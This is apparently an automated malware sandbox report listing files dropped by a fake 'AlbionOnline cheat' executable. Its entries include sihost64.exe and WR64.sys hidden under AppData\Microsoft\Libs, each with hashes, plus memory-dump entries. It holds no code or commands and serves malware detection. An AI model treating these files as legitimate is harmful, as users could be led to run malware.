SHA256
47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7

SHA512
f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
95099533bd1ac8cb7c824e9bc59a0891

SHA1
da546ebffa55004dbdf20f17a25a55f89a05f089

SHA256
066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772

SHA512
aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
95099533bd1ac8cb7c824e9bc59a0891

SHA1
da546ebffa55004dbdf20f17a25a55f89a05f089

SHA256
066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772

SHA512
aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
95099533bd1ac8cb7c824e9bc59a0891

SHA1
da546ebffa55004dbdf20f17a25a55f89a05f089

SHA256
066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772

SHA512
aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
95099533bd1ac8cb7c824e9bc59a0891

SHA1
da546ebffa55004dbdf20f17a25a55f89a05f089

SHA256
066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772

SHA512
aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\U4C9ER28.txt
MD5
67b24d1fa9987c6dfea0cc4ab3f328ca

SHA1
f72c4561e5011371f9e0fda02fec220fd6feb753

SHA256
8956d16227fac5fecaa5533ee17d08b6b6781b6045b13e6fc4e9e9246a6afda4

SHA512
3e593e500fb6ad278851312043913240b1da7909631969c7e64bb159e16e9008e3e83239341be1c00b31bbfd6a66fe2aa0da6d4fd14197999f59a9edb2be13e1

Download Submit
\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe
MD5
b46efcd7dbf7d2a57ca3e942fffb2214

SHA1
f8cf84367ce616c00e9966bd08d35084eec64010

SHA256
47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7

SHA512
f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f

Download Submit
\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe
MD5
25b608146d97e46e5cb8d5d4a77440c5

SHA1
ed5d75d64744a971a7bdb79ba68f4eb0aa7d2cab

SHA256
8504825018e604414d2ebb1093cf249c2f1d56125f6f33a20b071d6a008b8dd9

SHA512
3ae601c91d804c4d6c402ba73263e5749fafdfe35d68d510dc3b632a85d897bb1dc0e48dee4710deaea5932bcf34deb9ca13d4c0c664848abca0372190fb38b9

Download Submit
\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe
MD5
25b608146d97e46e5cb8d5d4a77440c5

SHA1
ed5d75d64744a971a7bdb79ba68f4eb0aa7d2cab

SHA256
8504825018e604414d2ebb1093cf249c2f1d56125f6f33a20b071d6a008b8dd9

SHA512
3ae601c91d804c4d6c402ba73263e5749fafdfe35d68d510dc3b632a85d897bb1dc0e48dee4710deaea5932bcf34deb9ca13d4c0c664848abca0372190fb38b9

Download Submit
\Users\Admin\AppData\Local\Temp\Services.exe
MD5
b46efcd7dbf7d2a57ca3e942fffb2214

SHA1
f8cf84367ce616c00e9966bd08d35084eec64010

SHA256
47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7

SHA512
f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
95099533bd1ac8cb7c824e9bc59a0891

SHA1
da546ebffa55004dbdf20f17a25a55f89a05f089

SHA256
066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772

SHA512
aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
95099533bd1ac8cb7c824e9bc59a0891

SHA1
da546ebffa55004dbdf20f17a25a55f89a05f089

SHA256
066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772

SHA512
aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35

Download Submit
memory/368-73-0x000007FEFC661000-0x000007FEFC663000-memory.dmp

Filesize
8KB

Download
memory/368-72-0x0000000000000000-mapping.dmp

Download
memory/640-101-0x0000000000000000-mapping.dmp

Download
memory/1092-59-0x0000000075A31000-0x0000000075A33000-memory.dmp

Filesize
8KB

Download
memory/1108-74-0x0000000000000000-mapping.dmp

Download
memory/1108-76-0x0000000000370000-0x0000000000372000-memory.dmp

Filesize
8KB

Download
memory/1316-92-0x000000013F380000-0x000000013F381000-memory.dmp

Filesize
4KB

Download
memory/1316-110-0x00000000023A0000-0x00000000023AA000-memory.dmp

Filesize
40KB

Download
memory/1316-89-0x0000000000000000-mapping.dmp

Download
memory/1316-100-0x000000001C610000-0x000000001C612000-memory.dmp

Filesize
8KB

Download
memory/1556-81-0x0000000000000000-mapping.dmp

Download
memory/1596-86-0x000000013F0D0000-0x000000013F0D1000-memory.dmp

Filesize
4KB

Download
memory/1596-83-0x0000000000000000-mapping.dmp

Download
memory/1596-97-0x00000000005D0000-0x00000000005D2000-memory.dmp

Filesize
8KB

Download
memory/1596-99-0x000000001C910000-0x000000001C912000-memory.dmp

Filesize
8KB

Download
memory/1644-114-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1644-113-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/1644-112-0x00000001402EB66C-mapping.dmp

Download
memory/1644-111-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1764-102-0x0000000000000000-mapping.dmp

Download
memory/1768-80-0x0000000000000000-mapping.dmp

Download
memory/1784-108-0x000000013F930000-0x000000013F931000-memory.dmp

Filesize
4KB

Download
memory/1784-104-0x0000000000000000-mapping.dmp

Download
memory/1784-116-0x0000000000940000-0x0000000000942000-memory.dmp

Filesize
8KB

Download
memory/1980-68-0x0000000000000000-mapping.dmp

Download
memory/2028-61-0x0000000000000000-mapping.dmp

Download
memory/2028-64-0x000000013F2C0000-0x000000013F2C1000-memory.dmp

Filesize
4KB

Download
memory/2028-78-0x000000001D070000-0x000000001D28B000-memory.dmp

Filesize
2.1MB

Download
memory/2028-79-0x000000001C910000-0x000000001C912000-memory.dmp

Filesize
8KB

Download